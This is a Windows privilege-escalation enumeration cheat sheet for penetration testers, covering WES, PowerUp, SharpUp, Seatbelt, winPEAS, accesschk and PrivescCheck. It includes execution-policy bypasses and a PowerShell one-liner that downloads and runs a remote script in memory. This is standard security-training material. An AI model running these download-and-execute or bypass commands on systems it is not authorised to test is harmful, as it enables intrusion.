Automated Exploitation

Running Scripts

Transfer files using certutil, powershell, python -m http.server, etc., and execute them in writable directories like:

C:\Temp
C:\Users\Public

Recommended and Verified Tools

Windows Exploit Suggester (WES)

Identifies missing patches and correlates with public exploits and Metasploit modules.

Setup and Usage:

git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
python windows-exploit-suggester.py --update

On the target machine:

systeminfo > sysinfo.txt

Run analysis:

python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt

If systeminfo doesn’t show hotfixes:

python windows-exploit-suggester.py --database 2018-02-08-mssb.xls --systeminfo sysinfo.txt

PowerUp.ps1

Detects common privilege escalation misconfigurations via PowerShell.

wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

Run manually:

powershell -exec bypass
. .\PowerUp.ps1
Invoke-AllChecks

Or remotely:

powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"

SharpUp.exe (if PowerShell is restricted)

• Code: https://github.com/GhostPack/SharpUp
• Binary: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe

Run:

.\SharpUp.exe

Seatbelt.exe

Collects extensive system information for post-exploitation or privilege escalation checks.

• Code: https://github.com/GhostPack/Seatbelt
• Binary: https://github.com/r3motecontrol/Ghostpa-CompiledBinaries/blob/master/Seatbelt.exe

Usage:

.\Seatbelt.exe all
.\Seatbelt.exe <check> <check>

winPEASany.exe

Powerful enumeration tool with clear visual output.

• Repo: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Enable colors in terminal:

reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Run checks:

.\winPEASany.exe quiet cmd fast
.\winPEASany.exe quiet cmd systeminfo

accesschk.exe

Checks user access rights on files, directories, services, registry keys.

• Download: https://xor.cat/assets/other/Accesschk.zip

Accept EULA (only required once):

accesschk.exe /accepteula

Scan weak file permissions:

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

Scan weak folder permissions:

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

PrivescCheck.ps1

Scans for exploitable misconfigurations and collects useful system data.

From cmd:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

From PowerShell:

Set-ExecutionPolicy Bypass -Scope process -Force
. .\PrivescCheck.ps1; Invoke-PrivescCheck

Extended mode:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"

Remember

• Start with non-invasive enumeration.
• Avoid running auto-exploits in exam or production environments.
• Save all output to .txt files for review and reporting.